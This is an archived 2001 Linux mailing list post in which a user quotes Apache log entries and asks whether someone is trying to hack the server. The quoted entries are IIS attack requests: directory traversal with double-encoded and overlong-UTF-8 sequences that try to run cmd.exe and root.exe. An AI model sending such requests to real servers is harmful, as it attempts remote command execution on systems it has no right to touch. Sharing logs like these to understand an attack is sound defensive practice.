[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
under attack ?
- To: "Linux - IL Mailing List" <linux-il(at-nospam)linux.org.il>
- Subject: under attack ?
- From: "Ishai Parasol" <ishai-iglu(at-nospam)parasol.org.il>
- Date: Wed, 19 Sep 2001 20:56:33 +0200
- Delivered-To: linux.org.il-linux-il@linux.org.il
- Sender: linux-il-bounce(at-nospam)cs.huji.ac.il
Hi
my apache logs gives me tons of this crap:
212.29.230.44 - - [19/Sep/2001:20:38:12 +0300] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 285 "-" "-"
212.29.230.44 - - [19/Sep/2001:20:38:26 +0300] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 283 "-" "-"
212.29.230.44 - - [19/Sep/2001:20:38:31 +0300] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"
212.29.230.44 - - [19/Sep/2001:20:38:34 +0300] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"
212.29.230.44 - - [19/Sep/2001:20:38:38 +0300] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"
212.29.230.44 - - [19/Sep/2001:20:38:44 +0300] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 324 "-" "-"
212.29.230.44 - - [19/Sep/2001:20:39:05 +0300] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 324 "-" "-"
212.29.230.44 - - [19/Sep/2001:20:39:08 +0300] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 340 "-" "-"
212.29.230.44 - - [19/Sep/2001:20:39:11 +0300] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"
212.29.230.44 - - [19/Sep/2001:20:39:17 +0300] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"
Does it mean someone thinks I'm running NT and try to hack to my server ?
I also get alot of "GET default.ide...." and about this I'm almost sure that
it's related to NT servers, but I'm not sure about the rest. Questions:
1) Am I right ?
2) What can I do about it ?
Thanks,
Ishai.
=================================================================
To unsubscribe, send mail to linux-il-request@linux.org.il with
the word "unsubscribe" in the message body, e.g., run the command
echo unsubscribe | mail linux-il-request@linux.org.il